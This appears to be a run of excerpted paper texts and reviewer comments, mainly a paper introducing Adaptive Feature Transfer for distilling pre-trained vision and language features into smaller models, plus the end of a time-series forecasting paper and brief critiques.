| 192 | MSE | 0.598 | 0.544 | 0.407 | 0.447 | 0.226 | 0.296 |
| | MAE | 0.250 | 0.284 | 0.247 | 0.280 | 0.239 | 0.279 |
| 336 | MSE | 0.578 | 0.523 | 0.529 | 0.520 | 0.276 | 0.334 |
| | MAE | 0.320 | 0.335 | 0.321 | 0.332 | 0.312 | 0.331 |

Figure 4: Evaluation of hyper-parameters $\beta$ and $\lambda$: (a) Informer on ETTh1; (b) Stationary on ETTh1; (c) PatchTST on ETTh1; (d) RMLP on ETTh1. We evaluate the impact of $\beta$ with Informer and Stationary on the ETTh1 dataset, and evaluate $\lambda$ with PatchTST and RMLP on the ETTh1 dataset.

4.3 Effect of Hyper-Parameters

We evaluate the effect of the hyper-parameter $\beta$ on the ETTh1 and ETTm2 datasets with two baselines. In Figure 4, we increase the value of $\beta$ from 0 to $10^5$ and evaluate the MSE with different prediction windows on the two datasets and two baselines. When $\beta$ is small, the baselines perform poorly and unstably. As $\beta$ increases, the baselines perform better and more stably. In addition, as the prediction window increases, the overfitting problem of the baselines becomes increasingly serious, so a larger $\beta$ is needed to remove superfluous information.
We also evaluate $\lambda$ with PatchTST and RMLP. We observe that the larger the $\lambda$, the better the models' performance; when $\lambda \geq 0.8$, the performance is stable.

5 Conclusion

This paper investigates two key factors in MTSF: temporal correlation and cross-variable correlation. To utilize the cross-variable correlation while eliminating superfluous information, we introduce Cross-Variable Decorrelation Aware Feature Modeling (CDAM). In addition, we propose Temporal Correlation Aware Modeling (TAM) to model the temporal correlations of the predicted series. Integrating CDAM and TAM, we build a novel time series modeling framework for MTSF termed InfoTime. Extensive experiments on various real-world MTSF datasets demonstrate the effectiveness of our framework.

References

Alexander A Alemi, Ian Fischer, Joshua V Dillon, and Kevin Murphy. Deep variational information bottleneck. arXiv preprint arXiv:1612.00410, 2016.

Mohammad Taha Bahadori and Zachary Chase Lipton. Temporal-clustering invariance in irregular healthcare time series. arXiv preprint arXiv:1904.12206, 2019.
FItPCl4uEc
However, in the general feature-based knowledge distillation framework [1], both teacher and student features can be transformed before minimizing their distance. This makes the proposed method a simple variant of the feature-based knowledge distillation framework, and it thus lacks novelty.
Efficient Transfer Learning from Arbitrary Pre-Trained Models Anonymous authors Paper under double-blind review Abstract Transfer learning typically involves loading pre-trained weights as an initialization, followed by fine-tuning on a downstream task. As pre-trained models become ever larger, this procedure is becoming prohibitively expensive, as we are forced to re-use the pre-trained architecture for fine-tuning. This procedure also precludes combining multiple pre-trained models that learn complementary information. Moreover, alternatives such as knowledge distillation do not reflect that we wish to transfer the aspects of the pre-trained representation that are most relevant to the downstream task. To address these challenges, we introduce Adaptive Feature Transfer (AFT). Instead of transferring weights, AFT operates purely on features, thereby decoupling the choice of the pre-trained model from the possibly smaller downstream model. AFT (1) enables transfer from multiple pre-trained models, even over multiple modalities, with minimal training overhead and no inference overhead; (2) selectively transfers the information in the pre-trained features most relevant for the downstream task, through a prior that favors low mutual information between the downstream inputs and features given the pre-trained features; and (3) performs feature transfer in an efficient kernel formulation that prioritizes the most relevant degrees of freedom. Empirically, AFT delivers a substantial boost in performance across diverse vision, language, and multi-modal datasets, relative to both standard transfer learning and knowledge distillation with the downstream model. Anonymous code for reproducing our results is available at https://anonymous.4open.science/r/aft-6C30. Figure 1: Adaptive Feature Transfer (AFT) enables compute-efficient transfer learning from an arbitrary set of pre-trained models into a single downstream model, significantly outperforming competing methods including Knowledge Distillation (KD) and B-Tuning (You et al., 2022) when averaged over (a) 6 vision tasks and (b) 8 NLP tasks. (c) AFT performance correlates uniquely well with the quality of the pre-trained features, as measured by the linear probe accuracy. The marker size indicates pre-trained model size, ranging from 87M to 2.7B parameters. 1 Introduction Despite its increasing importance, transfer learning methodology has not kept up with the demands of modern deep learning. It remains standard practice to simply start with a pre-trained parameter vector and then fine-tune on downstream data with the same architecture. As pre-trained models continue to grow in size (Bommasani et al., 2021; Brown et al., 2020; Dosovitskiy et al., 2020; Zhai et al., 2022), the computational burden of fine-tuning them escalates drastically, to the point that many practitioners do not possess the resources to fine-tune state-of-the-art models in vision and language. Furthermore, this approach precludes transferring from multiple pre-trained models that
To address these limitations, we propose Adaptive Feature Transfer (AFT), a highly efficient method to transfer from an arbitrary set of pre-trained models into a single downstream model within the compute budget of training only the downstream model. Based on the observation that the features from a well-pretrained models are likely to contain information highly relevant to downstream predictions, AFT introduces an informative prior favoring low mutual information between the downstream inputs and features given the pre-trained features. AFT then efficiently optimizes it by exploiting a kernel formulation of the objective. This approach empowers AFT to perform cross-architecture transfers and assimilate complementary information from multiple pre-trained models. Across multiple vision, language, and multi-modal datasets, we show AFT delivers a substantial performance improvement compared to both standard transfer learning (STL) and alternatives such as Knowledge Distillation and B-Tuning (You et al., 2022). Moreover, we find AFT exhibits a high correlation between its performance and the quality of pre-trained features, measured by their linear probe accuracies, and a strong ability to harness complementary information learned by multiple pre-trained models (Figure 1). 2 RELATED WORK Transfer learning Standard transfer learning proceeds by loading a pre-trained parameter vector as the initialization for parameters $\theta$ of a downstream model with the same architecture, followed by updating $\theta$ by minimizing the downstream loss $L(\theta)$, known as fine-tuning (Zhuang et al., 2019). This simple approach has enabled state-of-the-art performances on a wide range of vision (Dosovitskiy et al., 2020; Oquab et al., 2023; He et al., 2015) and language tasks (Devlin et al., 2018; Touvron et al., 2023). To extract additional useful information from the pre-trained model, Shwartz-Ziv et al. (2022) propose a Bayesian transfer learning approach. In addition to using the pre-trained initialization, this approach uses an approximate posterior for the pre-training data as an informative prior $p(\theta)$ for downstream learning, leading to improved performance across several vision datasets. Similar to standard transfer learning, this approach restricts the downstream model to have the same architecture as the pre-trained model, since it requires evaluating the approximate posterior of the pre-trained model at the downstream parameters $\theta$. Conceptually, the Bayesian transfer learning perspective points to a natural possibility of transferring across architectures or from many pre-trained models. This can be done by defining an informative prior that similarly facilitates the transfer of information learned by the pre-trained models without requiring the downstream model to have the same architecture. Knowledge distillation Knowledge Distillation (KD) (Hinton et al., 2015) is a method that can be applied to compress a large model, referred to as the teacher model, to a smaller model, referred to as the student model, with the goal of minimizing performance degradation (Wang & Yoon, 2020). Traditionally, KD starts with a teacher $T$ trained on a dataset $D$ and then trains the student $S$ to match the predictions of the teacher on the same dataset to achieve model compression. In the setting of transfer learning, this version of KD is generally not suitable for training a student to perform a novel downstream task, since the teacher does not predict the downstream targets (e.g. 
the classes may be different), and we therefore do not wish to match the student's predictions to the teacher's. Instead, we focus on the version of KD which trains the student to predict the teacher's features $\phi_T$, such as through a learned linear transformation $V$ applied to the student's features $\phi_S$ under a regression objective $\mathbb{E}_{x \sim D} \left[ \| \phi_T(x) - V \phi_S(x) \|_2^2 \right]$, where $V$ can account for the difference in dimensionality (Heo et al., 2019a; Huang & Wang, 2017; Heo et al., 2019b; Gu et al., 2023; Ahn et al., 2019). This procedure can be extended to use multiple teachers by simultaneously minimizing the sum of multiple KD objectives, each with a different teacher, as proposed in Liu et al. (2020); Wu et al. (2021), equivalent to simultaneously predicting the concatenation of the teachers' features. While KD is a natural candidate for model compression, its objective is fundamentally misaligned with the goal of transfer learning. Ahn et al. (2019) show that the feature-space KD objective has an information-theoretic interpretation as minimizing $H(\phi_T | \phi_S)$, the conditional entropy of the teacher features given the student features, which penalizes any information learned by the teacher but not by the student. Since the teacher was trained on a related but different pre-training task, we should only aim to transfer information useful for performing the downstream task, rather than compressing all information learned by the teacher into the student irrespective of its downstream relevance. **Multi-Source Transfer Learning** Lee et al. (2019) propose to learn a classifier defined as a weighted combination of frozen pre-trained features, where the weights are derived from non-linear maximal correlation analysis. Chang et al. (2022) use a mixture of experts (MoE) model to combine complementary information across different models and datasets to address the issue of data scarcity in materials science. These methods do not reduce the inference cost associated with large pre-trained models. Gu et al. (2023) propose to transfer features from the teachers to the student layer by layer, allowing for multiple teachers and different architectures. You et al. (2022) propose Bayesian Tuning (B-Tuning) to efficiently transfer from heterogeneous pre-trained models by encouraging the fine-tuned model to predict the approximate posterior predictive mean of a linear model with pre-trained feature extractors, a low-dimensional projection of the pre-trained features. In addition, several works propose to rank and select pre-trained models or features for transferring to a specific downstream task (You et al., 2022; Fumero et al., 2023; Deshpande et al., 2021). These methods are complementary to and can be used together with our method, which aims to maximize transfer performance once a set of pre-trained models is chosen. ### 3 Our Method: Adaptive Feature Transfer We now introduce Adaptive Feature Transfer (AFT), a method that enables transfer learning from a set of pre-trained models of arbitrary sizes and architectures into a single downstream model, with negligible compute overhead compared to only training the downstream model. #### 3.1 Constructing an Informative Prior from Pre-trained Features The core idea of AFT is to impose an informative prior on the downstream learning to favor making predictions based on information already present in the pre-trained features, as they are highly likely to contain useful knowledge for the downstream task.
Specifically, let $\theta \in \mathbb{R}^P$ be the downstream model parameters, let the random variable $X \in \mathbb{R}^{d_{\text{in}}}$ be the downstream inputs, $\Phi = \phi_\theta(X) \in \mathbb{R}^{d_\phi}$ the features of the downstream model, $Y = W\Phi \in \mathbb{R}^{d_{\text{out}}}$ the downstream model outputs, and $\Psi = \psi(X) \in \mathbb{R}^{d_\psi}$ some fixed pre-trained features, formed by concatenating the last-layer features of an arbitrary number of pre-trained models. We encode our preference with a prior that favors low mutual information between the downstream features $\Phi$ and the input $X$ conditioned on $\Psi$, $$p(\theta) \propto \exp(-\beta I(\Phi; X|\Psi)), \quad (1)$$ where $I(\Phi; X|\Psi)$ measures the information about the input used by the model to generate the downstream features $\Phi$ that is not present in the pre-trained features $\Psi$, and $\beta > 0$ controls the strength of this prior. The mutual information is given by $$I(\Phi; X|\Psi) = H(\Phi|\Psi) - H(\Phi|X,\Psi) = \mathbb{E}_{\Phi,\Psi}[-\log p(\Phi|\Psi)] + c \leq \mathbb{E}_{\Phi,\Psi}[-\log q_\rho(\Phi|\Psi)] + c, \quad (2)$$ where $H(\Phi|X,\Psi)$ equals some constant $c$ since $\Phi$ is deterministic given $X$, and we use a variational distribution $q_\rho(\Phi|\Psi)$ with variational parameters $\rho$ to approximate the inaccessible conditional density $p(\Phi|\Psi)$ and bound the mutual information. We then perform Maximum A Posteriori (MAP) estimation, which minimizes the resulting bound on the negative log-posterior, equal to $L(\theta) + \beta R(\theta)$, where $L(\theta)$ is the unregularized loss (e.g., the cross-entropy loss) and $R(\theta)$ is the bound on the mutual information, given by $$R(\theta) = \min_\rho \mathbb{E}_{\Phi,\Psi}[-\log q_\rho(\Phi|\Psi)], \quad (3)$$ where the expectation can only be estimated using training samples. The effect of optimizing this objective is to maximize the downstream data fit while minimizing the information in the downstream features $\Phi$ that cannot be decoded from the pre-trained features $\Psi$ via the map $q_\rho(\Phi|\Psi)$, after optimizing the variational parameters $\rho$.
Therefore, when optimized together with the training loss, our objective $R(\theta)$ makes it much easier for the downstream model to selectively transfer only the task-relevant features from pre-training. 3.2 IMPROVING THE OBJECTIVE USING THE KERNEL Estimating the regularization term $R(\theta)$ requires handling both optimization and statistical challenges: 1) since evaluating $R(\theta)$ requires finding the optimal variational parameters $\rho$, which changes every time we update $\theta$, we want to maximally simplify the optimization problem for $\rho$, and 2) since we wish to estimate the true $R(\theta)$, or equivalently the true $I(\Phi,X|\Psi)$, whose exact value is given by an expectation over the true rather than empirical distribution of $\Phi$ and $\Psi$, we want to avoid over-fitting to the training data when optimizing for $\rho$ when we replace the expectation in Eq. 4 with its empirical estimate. In addition to the simplifying assumption on the form of $q_\rho(\Phi|\Psi)$, we now show how to exploit a kernel formulation of the objective to further mitigate both challenges. Recall that the behavior of a linear model $f(\cdot) = w^\top \phi(\cdot)$ is completely characterized by its kernel $k_\Phi(x,x') = \phi(x)^\top \phi(x')$. From a kernel perspective, the existence of $\rho \in \mathbb{R}^{d_\phi \times d_\psi}$ such that $\Phi = \rho\Psi$ is exactly equivalent to the existence of $\hat{\rho} \in \mathbb{R}^{d_\phi \times d_\psi}$ such that $k_\Phi = k_{\hat{\rho}\Psi}$. Therefore, in AFT we replace the $\ell_2$ distance between the features with a distance between their kernel functions $$R_{AFT}(\theta) = \min_\rho \sqrt{\mathbb{E} \left[ (k_\Phi(X,X') - k_{\rho\Psi}(X,X'))^2 \right]},$$ (6) where $X$ and $X'$ are drawn from the input distribution. As with the previous objective in Eq. 4, this objective achieves a minimum value of 0 if and only if each $\phi_i(\cdot), i = 1, ..., d_\phi$, are in the span of $\{\psi_i(\cdot)\}_{i=1}^{d_\psi}$. However, the kernel formulation has the key advantage that part of the optimization problem over $\rho$ is done automatically since the kernel is invariant under any orthogonal transformation of the features, implying that we only need to optimize $\rho$ up to an orthogonal transformation, significantly reducing the complexity of the inner optimization. To prevent over-fitting the variational parameters $\rho$ to the empirical distribution of the features, we parameterize $\rho$ as a diagonal matrix $\text{diag}(\sigma(s))$, i.e., $\rho_{ii} = \sigma(s_i)$, where $\sigma$ is the sigmoid function and $s$ is a $d_\psi$-dimensional vector. Note the ability to use a diagonal $\rho$ is a distinct advantage of the kernel formulation, which does not require the features to have the same dimensions. Using this parameterization, we greatly reduce the number of variational parameters to optimize, while retaining the ability for the model to weigh each dimension of the pre-trained features according to their task-relevance. Furthermore, thanks to using the kernel formulation, we are effectively searching over all $\rho' = U\rho = U\text{diag}(s)$, where $U$ is any orthogonal matrix, that map between pre-trained and downstream features, without actually optimizing the dense matrix $U$. Finally, we normalize the features to have unit $\ell_2$ norm before computing the respective kernels, i.e., $k_\Phi(x,x') := \phi(x)^\top \phi(x') / \|\phi(x)\| \|\phi(x')\|$, to reduce the variance in the entries of the kernel. 
In Section 4.5, we compare AFT with its other variants and show that both using the kernel formulation and learning a diagonal $\rho$ indeed improve its performance. Stochastic kernel distance estimation For a practical implementation, we estimate \[ \delta(\theta, \rho) := \sqrt{\mathbb{E}[(k_\Phi(X, X') - k_{\rho\Psi}(X, X'))^2]} \] with the mini-batch estimate \( \hat{\delta}(\theta, \rho) := \sqrt{\frac{1}{B^2} \sum_{i=1}^{B} \sum_{j=1}^{B} (k_\Phi(x_i, x_j) - k_{\rho\Psi}(x_i, x_j))^2} = \frac{1}{B} \| K_{\Phi_{\text{batch}}} - K_{\rho\Psi_{\text{batch}}} \|_F \), where \( K_{\Phi_{\text{batch}}}\) and \( K_{\rho\Psi_{\text{batch}}}\) are kernel matrices evaluated on a batch of \( B \) inputs. We then perform gradient-based optimization jointly over \( (\theta, \rho) \). Algorithm 1 details the training procedure, using the SGD optimizer for simplicity. Note that we compute and cache the pre-trained features on the training set once and simply retrieve them during training, without spending additional time to compute them. **Algorithm 1 Adaptive Feature Transfer (AFT)** Require: Pre-computed pre-trained features, downstream data, downstream model \( f_\theta = W \circ \phi_\theta \), downstream loss function \( L \), batch size \( B \), learning rates \( (\eta_1, \eta_2) \), regularization coefficient \( \beta \) 1: for each mini-batch \( (X_{\text{batch}} \in \mathbb{R}^{B \times d_{\text{in}}}, Y_{\text{batch}} \in \mathbb{R}^{B \times d_{\text{out}}}, \Psi_{\text{batch}} \in \mathbb{R}^{B \times d_\psi}) \) do 2: Compute features \( \Phi_{\text{batch}} = \phi_\theta(X_{\text{batch}}) \in \mathbb{R}^{B \times d_\phi} \) and outputs \( \hat{Y}_{\text{batch}} = \Phi_{\text{batch}} W^\top \) 3: Scale pre-trained features \( \Psi_{\text{batch}} \leftarrow \Psi_{\text{batch}} \rho^\top \) 4: Subtract the mini-batch mean from \( \Phi_{\text{batch}} \) and \( \Psi_{\text{batch}} \) and normalize each row 5: Compute \( B \times B \) mini-batch kernels \( K_{\Phi_{\text{batch}}} = \Phi_{\text{batch}} \Phi_{\text{batch}}^\top \), \( K_{\rho\Psi_{\text{batch}}} = \Psi_{\text{batch}} \Psi_{\text{batch}}^\top \) 6: Compute the mini-batch loss \( \hat{L}(\theta) = L(\theta, Y_{\text{batch}}, \hat{Y}_{\text{batch}}) \) and the kernel distance estimate: \[ \hat{\delta}(\theta, \rho) = \frac{1}{B} \| K_{\Phi_{\text{batch}}} - K_{\rho\Psi_{\text{batch}}} \|_F \] 7: Update \( \theta \) and \( \rho \) using SGD: \[ \theta \leftarrow \theta - \eta_1 \nabla_\theta \left( \hat{L}(\theta) + \beta \hat{\delta}(\theta, \rho) \right), \quad \rho \leftarrow \rho - \eta_2 \nabla_\rho \hat{\delta}(\theta, \rho) \] 8: end for 4 EXPERIMENTS We evaluate our proposed method, Adaptive Feature Transfer (AFT), across a variety of vision, language, and multi-modal datasets and compare it with standard transfer learning (STL), Knowledge Distillation (KD), and B-Tuning (You et al., 2022). All four methods start with the same pre-trained initialization of the downstream model, except that AFT, KD, and B-Tuning additionally optimize their respective regularization terms that enable transfer from one or multiple additional pre-trained models. A hyperparameter \( \beta > 0 \) is tuned on validation performance to optimally weight the regularization term for each method. We include full experiment details, such as hyperparameter tuning, in Appendix A. We report the mean and standard errors computed across 3 runs for each method.
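As a companion to Algorithm 1, the following is a minimal sketch of the training loop in PyTorch, reusing the `kernel_distance` helper sketched earlier. Assumptions: a data loader that yields the cached pre-trained features alongside each batch, and folding $\beta$ into $\rho$'s update, which only rescales its effective learning rate relative to the algorithm as stated.

```python
import torch

def train_aft(model, head, s, loader, loss_fn, beta, lr_theta, lr_rho, epochs):
    # model: downstream feature extractor phi_theta; head: linear layer W;
    # s: (d_psi,) tensor with requires_grad=True, rho = diag(sigmoid(s));
    # loader yields (inputs, targets, cached pre-trained features psi).
    opt = torch.optim.SGD([
        {"params": list(model.parameters()) + list(head.parameters()),
         "lr": lr_theta},
        {"params": [s], "lr": lr_rho},
    ])
    for _ in range(epochs):
        for x, y, psi in loader:
            phi = model(x)                      # downstream features
            task_loss = loss_fn(head(phi), y)   # e.g. cross-entropy
            reg = kernel_distance(phi, psi, s)  # stochastic estimate of Eq. 6
            opt.zero_grad()
            (task_loss + beta * reg).backward() # joint update of (theta, rho)
            opt.step()
```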
4.1 IMAGE CLASSIFICATION Effective transfer from SOTA vision foundation models We evaluate AFT's ability to transfer from state-of-the-art vision foundation models into commonly used downstream architectures, including ViT-S (Dosovitskiy et al., 2020), MLP-Mixer-B (Tolstikhin et al., 2021), and ResNet-50 (He et al., 2015). We initialize the downstream models with ImageNet-1K checkpoints for all methods. In Figures 2a and 2b, we show performance when transferring from ViT-G DINOv2, the largest model in the DINOv2 family with over a billion parameters, on the CIFAR-10 (Krizhevsky et al., 2009), CIFAR-100 (Krizhevsky et al., 2009), Oxford Flowers-102 (Nilsback & Zisserman, 2008), Oxford-IIIT Pets (Parkhi et al., 2012), Describable Textures Dataset (DTD) (Cimpoi et al., 2014), and Food-101 (Bossard et al., 2014) datasets. We find AFT significantly boosts the performance of all three models, reducing the error by an average of over 15% relative to STL performance (Figure 2a), and considerably outperforms KD and B-Tuning in most cases as well as on average. Transfer from multiple pre-trained models In Figure 2c, we show the performance on CIFAR-100 when transferring from various vision foundation models, including BiT ResNet-101x3 (Kolesnikov et al., 2020) (denoted BiT), CLIP ViT-G (Radford et al., 2021) (denoted CLIP), and ViT-G DINOv2 (Oquab et al., 2023) (denoted DINO). AFT yields large improvements over STL and significantly outperforms all other competing methods except for ResNet-50, where KD is better
As a result, we can predict for which pre-trained model(s) AFT will likely Figure 3: Evaluation on 8 language dataset using BERT Small and DistillBert as downstream models. (a) AFT achieves a significantly lower normalized error, averaged across 6 datasets and 2 downstream models when transferring from Flan-T5 Large. The error is normalized by the STL error before averaging. (b) Breakdown of unnormalized error for each downstream model and dataset. (c) Downstream accuracy versus linear probe accuracy of pre-trained features for AFT, B-Tuning, and KD, averaged across both downstream models on BoolQ. AFT yields consistent performance gains as we improve the quality of the pre-trained features, showing the highest correlation with the linear probe accuracy. The marker size is proportional to the number of parameters in the pre-trained models, ranging from 61M to 14B. achieve the best performance, by evaluating their linear probe accuracies, greatly simplifying the selection of the pre-trained model(s) in practice. Indeed, we could have correctly predicted in every setting that transferring from ViT DINOv2 + ViT CLIP would outperform transferring from either by noting that the combination of both models has a higher linear probe accuracy than either model. By comparison, other methods’ performance is less well correlated with the linear probe accuracy, which explains why they don’t benefit from transferring multiple models and provides strong evidence to our claim that AFT is a superior approach to transfer learning that should scale better as we use larger and better pre-trained models. While the linear probe accuracy of a sufficiently large pre-trained model can exceed the accuracy of AFT, the former is only efficient to train (via logistic regression) but still expensive to deploy, as it requires inference with the original pre-trained model, and is therefore not a viable alternative to the methods considered here. For example, the linear probe accuracy of ViT-L CLIP roughly matches AFT accuracy when transferred to ViT-S on CIFAR-100, but ViT-L CLIP has 428M parameters, 20 times larger than ViT-S. 4.2 Natural Language Processing We explore transferring from some of the strongest open-source large language models, including GPT-2 (Radford et al., 2019), Flan-T5 (Chung et al., 2022), and LLaMA 2 (Touvron et al., 2023), into much smaller ones: BERT Small (Devlin et al., 2018) and DistillBERT (Sanh et al., 2020). In language models, there is no exact analog of last-layer features at the input level since the model maintains an embedding for each token. As such, we follow the common practices for extracting input (i.e. sequence) level features for the following models used in our evaluation as follows: we use the embedding of the [CLS] token for BERT models, and the decoder’s embedding of the last token for GPT-3, Flan-T5, and LLaMA. In Figure 3a and 3b, we show the performance of AFT and competing methods at transferring from Flan-T5 Large to BERT Small and DistilBERT on the following 8 datasets: Large Movie Review (IMDB) (Maas et al., 2011), BoolQ (Wang et al., 2019), MNLI (Williams et al., 2018), SST-2 (Socher et al., 2013), MRPC (Dolan & Brockett, 2005), QQP (Wang et al., 2018), QNLI (Rajpurkar et al., 2016) and RTE (Wang et al., 2018). AFT significantly outperforms the competing methods. 
Similar to the case for vision, we find AFT's performance scales with a strong correlation with the linear probe accuracy of the pre-trained features, as shown in Figure 3c, whereas other methods show a much lower correlation. In addition, we find that using AFT with instruction-tuned pre-trained language models, like Flan-T5 and LLaMA Chat, leads to the best performance after transfer, in line with their superior zero-shot question-answering capabilities (Chung et al., 2022). Unlike on the vision datasets, we find that combining multiple pre-trained models often leads to no improvement in AFT's performance, as shown in Figure 3c. However, this behavior is not surprising, since combining these pre-trained models does not increase the linear probe accuracy either, suggesting there is little complementary, non-overlapping information learned across these pre-trained language models. A natural explanation is that these pre-trained large language models are all highly similar to each other in their pre-training datasets, objectives, and architectures, since they are all transformer-based generative models trained predominantly with next- or masked-token prediction on a similar distribution of text from the internet. 4.3 Multi-modality The capability to efficiently transfer from multiple models naturally positions AFT for use in multi-modal applications. In these settings, the architecture typically includes modality-specific sub-components, like an image encoder and a text encoder. Since pre-trained models with strong performance often exist for each individual modality, we expect AFT can boost multi-modal performance by transferring the complementary, modality-specific features learned by these models. To illustrate this possibility, we consider SNLI-VE (Xie et al., 2019; 2018), a challenging visual entailment dataset where the objective is to determine whether a given text accurately corresponds to an image, with the possible classes being positive, negative, or neutral. We use the smallest version of CLIP as the downstream model, which consists of a ResNet-50 image encoder and a transformer text encoder, initialized to the trained checkpoint. From the image features $\phi_I(x_I)$ and text features $\phi_T(x_T)$, we construct a classifier $f_\theta(x_I, x_T) = W \phi(x_I, x_T)$ whose features $\phi(x_I, x_T)$ are given by the (flattened) tensor product $\phi_I(x_I) \otimes \phi_T(x_T)$, which represents the pairwise interactions between the image and text features and enables computations such as $\phi_I(x_I)^\top \phi_T(x_T)$, a measure of semantic similarity between the image and text due to the CLIP pre-training. In Table 1, we find that AFT can improve CLIP's performance on this task by simultaneously transferring from a ViT-L trained with DINOv2 and LLaMA 13B, and again outperforms KD. Table 1: AFT improves CLIP's accuracy on SNLI-VE by transferring from DINOv2 and LLaMA 13B. | Method | STL | KD | AFT | |------------|-------|-------|--------| | SNLI-VE Acc.| 73.69±0.28 | 74.05±0.05 | **74.39±0.18** | 4.4 Visualizing learned feature weighting in $\rho$ In Figure 4a, we show the distribution of learned feature weights $\rho_i$ at convergence on CIFAR-100, with ViT-S as the downstream model and pre-trained models from the set {BiT, DINO, CLIP}. AFT indeed learns a non-uniform weighting over individual features ($\rho_i$ is initialized to 0.5 for all $i$).
When transferring from all three models, AFT learns to upweight the CLIP and DINO features and downweight the BiT features, in line with our finding in Figure 2c that adding BiT to the DINO and CLIP features did not further improve transfer performance. In Figure 4b, we show the weights learned when we transfer from DINO and a random-noise model whose features contain no useful information and are sampled from $\mathcal{N}(0, I_{d_{noise}})$, where $d_{noise} = 2048$ is the feature dimension of the noise model. AFT successfully assigns much smaller weights to the noise features, so that performance is unaffected by their presence, as shown in Figure 4c. By contrast, KD performance quickly degrades to near-STL level as we introduce the noise features. Figure 4: (a) Distribution of learned feature weights $\rho$ for each pre-trained model. The legend shows which pre-trained models are simultaneously used. (b) Distribution of $\rho$ in the presence of random noise features. (c) AFT performance as a function of noise dimensions. ### 4.5 Ablation Experiments We investigate the impact of key design choices in AFT on its performance on the CIFAR-100 and BoolQ datasets. We compare AFT with four other variants in which a) we do not use the kernel formulation and directly use the objective in Eq. 4 as a regularizer, b) the ability to learn a diagonal $\rho$ is disabled, causing it to default to the identity, c) we replace the linear kernel $k(x, x') = \phi(x)^\top \phi(x')$ with the radial basis function (RBF) kernel $k(x, x') = \exp\left(-\|\phi(x) - \phi(x')\|^2\right)$, or d) we perform bi-level optimization over $\theta$ and $\rho$ by performing 5 inner updates of $\rho$ per update of $\theta$. We find that using the kernel formulation and learning the feature weights $\rho$ are essential to AFT's performance, while alternative kernels such as the RBF kernel and bi-level optimization do not impact performance in any significant way. We also investigate the effectiveness of AFT in data-scarce scenarios by sub-sampling the CIFAR-100 and BoolQ training sets. AFT remains the most effective method across training-set sizes. Figure 5: (a) Ablation studies: using the kernel and learning $\rho$ are the most essential contributors to AFT's performance. (b) AFT is the best-performing method across dataset sizes. ### 5 Conclusion Our work addresses an important and timely problem in transfer learning: how to efficiently transfer from the variety of pre-trained models, each requiring increasingly large compute budgets to directly fine-tune and perform inference with, into a single smaller downstream model. To do so, we propose AFT, a novel method for transfer learning that accurately reflects the reality that not all pre-trained features will be relevant to the downstream task. As a result, AFT is fundamentally better suited for transfer learning than Knowledge Distillation, which transfers information irrespective of its relevance to the downstream task. Through an extensive evaluation with various state-of-the-art pre-trained models and downstream models on 15 datasets across vision, language, and vision-language tasks, we show AFT significantly outperforms the competing methods across the board and benefits considerably more from stronger pre-trained models. We hope our work enables the community to more effectively leverage large pre-trained models that have otherwise been prohibitively expensive to use.
REPRODUCIBILITY STATEMENT We provide a self-contained anonymous code base for reproducing all results at https://anonymous.4open.science/r/aft-6C30. We also provide training details, including the hyperparameter grid, optimizer, and data preprocessing, in Appendix A. We have carefully checked that the method description presented in Section 3 correctly corresponds to our implementation. REFERENCES Sungsoo Ahn, Shell Xu Hu, Andreas Damianou, Neil D Lawrence, and Zhenwen Dai. Variational information distillation for knowledge transfer. In Proceedings of the IEEE/CVF conference on computer vision and pattern recognition, pp. 9163–9171, 2019. Rishi Bommasani, Drew A. Hudson, Ehsan Adeli, Russ B. Altman, Simran Arora, Sydney von Arx, Michael S. Bernstein, Jeannette Bohg, Antoine Bosselut, Emma Brunskill, Erik Brynjolfsson, Shyamal Buch, Dallas Card, Rodrigo Castellon, Niladri S. Chatterji, Annie S. Chen, Kathleen Creel, Jared Quincy Davis, Dorottya Demszky, Chris Donahue, Moussa Doumbouya, Esin Durmus, Stefano Ermon, John Etchemendy, Kawin Ethayarajh, Li Fei-Fei, Chelsea Finn, Trevor Gale, Lauren Gillespie, Karan Goel, Noah D. Goodman, Shelby Grossman, Neel Guha, Tatsunori Hashimoto, Peter Henderson, John Hewitt, Daniel E. Ho, Jenny Hong, Kyle Hsu, Jing Huang, Thomas Icard, Saahil Jain, Dan Jurafsky, Pratyusha Kalluri, Siddharth Karamcheti, Geoff Keeling, Fereshte Khani, Omar Khattab, Pang Wei Koh, Mark S. Krass, Ranjay Krishna, Rohith Kuditipudi, and et al. On the opportunities and risks of foundation models. CoRR, abs/2108.07258, 2021. URL https://arxiv.org/abs/2108.07258 Lukas Bossard, Matthieu Guillaumin, and Luc Van Gool. Food-101 – mining discriminative components with random forests. In European Conference on Computer Vision, 2014. Tom Brown, Benjamin Mann, Nick Ryder, Melanie Subbiah, Jared D Kaplan, Prafulla Dhariwal, Arvind Neelakantan, Pranav Shyam, Girish Sastry, Amanda Askell, et al. Language models are few-shot learners. Advances in neural information processing systems, 33:1877–1901, 2020. Rees Chang, Yu-Xiong Wang, and Elif Ertekin. Towards overcoming data scarcity in materials science: unifying models and datasets with a mixture of experts framework. npj Computational Materials, 8(1):242, 2022. Ting Chen, Simon Kornblith, Mohammad Norouzi, and Geoffrey Hinton. A simple framework for contrastive learning of visual representations. In International conference on machine learning, pp. 1597–1607. PMLR, 2020. Hyung Won Chung, Le Hou, Shayne Longpre, Barret Zoph, Yi Tay, William Fedus, Yunxuan Li, Xuezhi Wang, Mostafa Dehghani, Siddhartha Brahma, Albert Webson, Shixiang Shane Gu, Zhuyun Dai, Mirac Suzgun, Xinyun Chen, Aakanksha Chowdhery, Alex Castro-Ros, Marie Pellat, Kevin Robinson, Dasha Valter, Sharan Narang, Gaurav Mishra, Adams Yu, Vincent Zhao, Yanping Huang, Andrew Dai, Hongkun Yu, Slav Petrov, Ed H. Chi, Jeff Dean, Jacob Devlin, Adam Roberts, Denny Zhou, Quoc V. Le, and Jason Wei. Scaling instruction-finetuned language models, 2022. M. Cimpoi, S. Maji, I. Kokkinos, S. Mohamed, and A. Vedaldi. Describing textures in the wild. In Proceedings of the IEEE Conf. on Computer Vision and Pattern Recognition (CVPR), 2014. Aditya Deshpande, Alessandro Achille, Avinash Ravichandran, Hao Li, Luca Zancato, Charless Fowlkes, Rahul Bhotika, Stefano Soatto, and Pietro Perona. A linearized framework and a new benchmark for model selection for fine-tuning. arXiv preprint arXiv:2102.00084, 2021. Jacob Devlin, Ming-Wei Chang, Kenton Lee, and Kristina Toutanova.
MQ4JJIYKkh
Scaled up, however, both the reward model and the approximate planning model would need to be far more complex, to the point where we would not expect (an approximation of) Bayesian IRL to be any more sample efficient than behavioral cloning with a similarly complex policy model.
